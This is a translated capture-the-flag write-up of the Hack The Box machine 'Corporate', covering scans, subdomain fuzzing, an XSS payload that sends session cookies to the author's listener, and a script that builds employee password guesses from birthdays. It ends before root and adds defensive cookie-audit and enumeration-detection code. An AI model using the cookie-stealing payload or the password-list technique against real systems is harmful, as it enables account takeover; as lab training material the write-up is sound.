HTB-Corporate(Insane)

admin, 2024-01-10 15:47:45, 707 views, 6250 characters, 20 min 50 s read

Preface: a bit of a pity. This was the last box of the season; I'm too much of a noob and gave up, so just a quick note. Only got user.


Scan

┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ sudo nmap -p- --min-rate 10000 10.10.11.246
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 07:43 EST
Nmap scan report for 10.10.11.246
Host is up (0.67s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 40.26 seconds

Subdomains
Subdomain brute force

┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ wfuzz -H "Host: FUZZ.corporate.htb" --hw 11 -c -z file,"/home/kali/wordlists/subdomains-top1million-5000.txt" http://corporate.htb/
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://corporate.htb/
Total requests: 4992

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000035:   200        38 L     175 W      1725 Ch     "support"
000000287:   302        0 L      4 W        38 Ch       "sso"
000000263:   403        7 L      9 W        159 Ch      "git"
000000847:   302        0 L      4 W        32 Ch       "people"


XSS
Saw an XSS payload while browsing the forum and just lifted it:

<a href="http://corporate.htb/<script+src='/vendor/analytics.min.js'></script><script+src='/assets/js/analytics.min.js?v=document.location=`http://10.10.14.51:8888/${document.cookie}`'</script>" id="send-message">

Start your own Python HTTP server and the cookie arrives once the link is opened in the chat window.


There is CORS here; the captured cookie is used to log in to the people subdomain.
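The payload above works because the session cookie can be read from document.cookie and is accepted on another subdomain. As an added defender-side example (not code from the original write-up), the following script audits Set-Cookie headers for the attributes that would blunt that: HttpOnly keeps a cookie out of document.cookie, Secure keeps it off plaintext HTTP, SameSite=Lax/Strict limits cross-site sending, and a Domain attribute means the cookie is shared by every subdomain. The cookie names are the ones seen on the box; the header values and the Domain attribute are constructed for illustration, not observed.

```python
"""Audit Set-Cookie headers for protections against cookie theft via XSS.

Added example; not part of the original write-up. Cookie names mirror the
ones seen on the box, header values below are constructed."""

SESSION_COOKIES = ("CorporateSSO", "session", "session.sig")


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # attribute names are case-insensitive
    return name.strip(), value, attrs


def audit_set_cookie(header, session_cookies=SESSION_COOKIES):
    """Report missing protections for one Set-Cookie header.

    Only cookies listed in session_cookies are judged; for the rest the
    report is returned with an empty 'missing' list."""
    name, _value, attrs = parse_set_cookie(header)
    report = {
        "name": name,
        "session": name in session_cookies,
        "missing": [],
        "subdomain_wide": "domain" in attrs,   # Domain= shares it with all subdomains
    }
    if not report["session"]:
        return report
    if "httponly" not in attrs:
        report["missing"].append("HttpOnly")            # readable via document.cookie
    if "secure" not in attrs:
        report["missing"].append("Secure")              # also sent over plain HTTP
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        report["missing"].append("SameSite=Lax|Strict")  # sent on cross-site requests
    return report


def audit_response(set_cookie_headers):
    """Audit every Set-Cookie header of one response and return the findings
    for session cookies that lack a protection or are subdomain-wide."""
    return [
        r for r in map(audit_set_cookie, set_cookie_headers)
        if r["session"] and (r["missing"] or r["subdomain_wide"])
    ]


# Constructed sample response headers (not captured from the box).
CONSTRUCTED_HEADERS = [
    "CorporateSSO=eyJhbGciOiJIUzI1NiJ9.c2FtcGxl.c2ln; Path=/; Domain=.corporate.htb",
    "session=eyJmbGFzaGVzIjp7fX0=; Path=/; HttpOnly; Secure; SameSite=Lax",
    "session.sig=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",
    "theme=dark; Path=/",
]

if __name__ == "__main__":
    for finding in audit_response(CONSTRUCTED_HEADERS):
        print(finding)
```

Run against real headers by feeding it `response.raw.headers.getlist("Set-Cookie")` from a requests response; with the constructed sample only CorporateSSO is reported, lacking all three attributes and being subdomain-wide.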


People
Grab another VPN configuration from people.corporate.htb.


VPN

┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ nmap --iflist
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 08:21 EST
************************INTERFACES************************
DEV     (SHORT)   IP/MASK                      TYPE        UP MTU   MAC
lo      (lo)      127.0.0.1/8                  loopback    up 65536
lo      (lo)      ::1/128                      loopback    up 65536
eth0    (eth0)    192.168.141.148/24           ethernet    up 1500  00:0C:29:8F:3C:7E
eth0    (eth0)    fe80::ef9f:8e93:2e6c:2f82/64 ethernet    up 1500  00:0C:29:8F:3C:7E
docker0 (docker0) 172.17.0.1/16                ethernet    up 1500  02:42:27:7F:7D:71
tun0    (tun0)    10.10.14.51/23               point2point up 1500
tun0    (tun0)    fe80::9a24:40b8:dfbb:ab7/64  point2point up 1500
tun0    (tun0)    dead:beef:2::1031/64         point2point up 1500
tun1    (tun1)    10.8.0.7/24                  point2point up 1500
tun1    (tun1)    fe80::8aa0:d8ea:1934:c42a/64 point2point up 1500

**************************ROUTES**************************
DST/MASK                      DEV     METRIC GATEWAY
10.8.0.0/24                   tun1    0
10.9.0.0/24                   tun1    0      10.8.0.1
192.168.141.0/24              eth0    100
10.10.10.0/23                 tun0    0      10.10.14.1
10.10.14.0/23                 tun0    0
10.129.0.0/16                 tun0    0      10.10.14.1
172.17.0.0/16                 docker0 0
0.0.0.0/0                     eth0    100    192.168.141.2
::1/128                       lo      0
dead:beef:2::1031/128         tun0    0
fe80::8aa0:d8ea:1934:c42a/128 tun1    0
fe80::9a24:40b8:dfbb:ab7/128  tun0    0
fe80::ef9f:8e93:2e6c:2f82/128 eth0    0
dead:beef:2::/64              tun0    256
fe80::/64                     tun0    256
fe80::/64                     tun1    256
dead:beef::/64                tun0    1024
fe80::/64                     eth0    1024
ff00::/8                      eth0    256
ff00::/8                      tun0    256
ff00::/8                      tun1    256

nmap scan of the /24 ranges reachable over the new tunnel:

┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ sudo nmap -p- --min-rate 10000 10.8.0.0/24
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 08:21 EST
Warning: 10.8.0.1 giving up on port because retransmission cap hit (10).
Warning: 10.8.0.2 giving up on port because retransmission cap hit (10).
Warning: 10.8.0.3 giving up on port because retransmission cap hit (10).
Warning: 10.8.0.4 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.8.0.1
Host is up (0.33s latency).
Not shown: 64357 closed tcp ports (reset), 1170 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
389/tcp  open  ldap
636/tcp  open  ldapssl
2049/tcp open  nfs
3004/tcp open  csoftragent
3128/tcp open  squid-http
8006/tcp open  wpl-analytics

Nmap scan report for 10.8.0.2
Host is up (0.37s latency).
All 65535 scanned ports on 10.8.0.2 are in ignored states.
Not shown: 64425 closed tcp ports (reset), 1110 filtered tcp ports (no-response)

Nmap scan report for 10.8.0.3
Host is up (0.41s latency).
Not shown: 64338 closed tcp ports (reset), 1195 filtered tcp ports (no-response)
PORT     STATE SERVICE
8006/tcp open  wpl-analytics
8888/tcp open  sun-answerbook

Nmap scan report for 10.8.0.4
Host is up (0.70s latency).
Not shown: 64497 closed tcp ports (reset), 1037 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap scan report for 10.8.0.7
Host is up (0.000012s latency).
All 65535 scanned ports on 10.8.0.7 are in ignored states.
Not shown: 65535 closed tcp ports (reset)

Nmap done: 256 IP addresses (5 hosts up) scanned in 149.27 seconds

┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ sudo nmap -p- --min-rate 10000 10.9.0.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 08:24 EST
Warning: 10.9.0.4 giving up on port because retransmission cap hit (10).
Warning: 10.9.0.1 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.9.0.1
Host is up (0.29s latency).
Not shown: 64884 closed tcp ports (reset), 643 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
389/tcp  open  ldap
636/tcp  open  ldapssl
2049/tcp open  nfs
3004/tcp open  csoftragent
3128/tcp open  squid-http
8006/tcp open  wpl-analytics

Nmap scan report for 10.9.0.4
Host is up (0.29s latency).
Not shown: 65012 closed tcp ports (reset), 521 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind

Nmap done: 256 IP addresses (2 hosts up) scanned in 47.83 seconds

Sharing
There is a file-sharing feature, so I XSS a fresh cookie here (you cannot share a file with yourself).


After the brute force, check my own sharing page: there is a PDF describing the password policy.


Write a script to build the user/password list, then brute force it with msf or hydra:

import re
import requests

start = 5000
end = 6000
userpasswordlist_file = "userpasswordlist.txt"
custom_cookie = "CorporateSSO=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NTA3NywibmFtZSI6IkNlY2VsaWEiLCJzdXJuYW1lIjoiV2VzdCIsImVtYWlsIjoiQ2VjZWxpYS5XZXN0QGNvcnBvcmF0ZS5odGIiLCJyb2xlcyI6WyJzYWxlcyJdLCJyZXF1aXJlQ3VycmVudFBhc3N3b3JkIjp0cnVlLCJpYXQiOjE3MDMzMTE2NjAsImV4cCI6MTcwMzM5ODA2MH0.0Y55Nhk8W5DKIHqbi3plxzBtwdAGq3C9x2Y9fhxdev8; session=eyJmbGFzaGVzIjp7ImluZm8iOltdLCJlcnJvciI6W10sInN1Y2Nlc3MiOltdfX0=; session.sig=UDEZUiAvbn45P9_AxzLVFkXELfM"
headers = {"Cookie": custom_cookie}

# Walk the employee pages and pull out each e-mail address and birthday
for i in range(start, end + 1):
    url = f"http://people.corporate.htb/employee/{i}"
    response = requests.get(url, headers=headers)
    content = response.text
    # Match the e-mail address; its local part becomes the username
    email_match = re.search(r'<a href="mailto:(.*?)">', content)
    # Match the birthday cell; it becomes the suffix of the starter password
    birthday_match = re.search(
        r'<th scope="row">Birthday</th>\s+<td>(.*?)</td>', content
    )
    if birthday_match and email_match:
        email = email_match.group(1).split("@")[0]
        birthday = birthday_match.group(1)
        match = re.match(r"(\d+)/(\d+)/(\d+)", birthday)
        if not match:
            continue  # birthday not in month/day/year form, skip this page
        month = match.group(1)
        day = match.group(2)
        year = match.group(3)
        birthday = day + month + year
        with open(userpasswordlist_file, "a") as file:
            file.write(email + " CorporateStarter" + birthday + "\n")
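The script above requests /employee/5000 through /employee/6000 one after another from a single client, which is easy to spot on the server side. As an added detection example (not from the original write-up), the following parses web server access lines in the common log format, groups /employee/<id> requests per client address, and flags clients whose requests form a long, mostly consecutive run of IDs. The log lines are constructed for this example; the client address 10.10.14.51 is the attacker's tun0 address from the interface listing above.

```python
"""Detect sequential /employee/<id> enumeration in access logs.

Added example; not part of the original write-up. Sample log lines are
constructed to mimic the script above and are not real server logs."""
import re
from collections import defaultdict

# Common log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
EMPLOYEE_RE = re.compile(r"^/employee/(\d+)$")


def employee_ids_by_client(lines):
    """Map client address -> list of employee IDs requested, in log order."""
    seen = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access line; ignore
        e = EMPLOYEE_RE.match(m["path"])
        if not e:
            continue  # some other page
        seen[m["ip"]].append(int(e.group(1)))
    return seen


def sequential_fraction(ids):
    """Fraction of consecutive requests whose ID is exactly the previous + 1."""
    if len(ids) < 2:
        return 0.0
    steps = sum(1 for a, b in zip(ids, ids[1:]) if b - a == 1)
    return steps / (len(ids) - 1)


def flag_enumeration(lines, min_requests=20, min_sequential=0.8):
    """Return {client: stats} for clients that look like ID enumeration:
    at least min_requests employee pages, mostly in ascending ID order."""
    flagged = {}
    for ip, ids in employee_ids_by_client(lines).items():
        frac = sequential_fraction(ids)
        if len(ids) >= min_requests and frac >= min_sequential:
            flagged[ip] = {
                "requests": len(ids),
                "sequential": round(frac, 2),
                "range": (min(ids), max(ids)),
            }
    return flagged


# Constructed sample: one client walking IDs 5000..5029, one browsing normally.
SAMPLE_LOG = [
    f'10.10.14.51 - - [23/Dec/2023:08:50:{i % 60:02d} -0500] '
    f'"GET /employee/{5000 + i} HTTP/1.1" 200 4321'
    for i in range(30)
] + [
    '10.8.0.20 - - [23/Dec/2023:08:51:02 -0500] "GET /employee/5077 HTTP/1.1" 200 4321',
    '10.8.0.20 - - [23/Dec/2023:08:53:10 -0500] "GET /employee/5120 HTTP/1.1" 200 4300',
    '10.8.0.20 - - [23/Dec/2023:08:55:41 -0500] "GET /sharing HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for ip, stats in flag_enumeration(SAMPLE_LOG).items():
        print(ip, stats)
```

Feed it `open("access.log")` instead of SAMPLE_LOG to run it over a real log; lowering min_requests catches slower enumeration at the cost of more noise, and the same pattern applies to any numeric-ID endpoint by swapping EMPLOYEE_RE.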


Root
Didn't manage to get root.


Season 3 over

Originally published on the WeChat public account 搁浅安全: HTB-Corporate(Insane)

Posted by admin on 2024-01-10 15:47:45.
When reposting, please keep the link to this article (CN-SEC 中文网; thanks to the original author for their work): https://cn-sec.com/archives/2376222.html
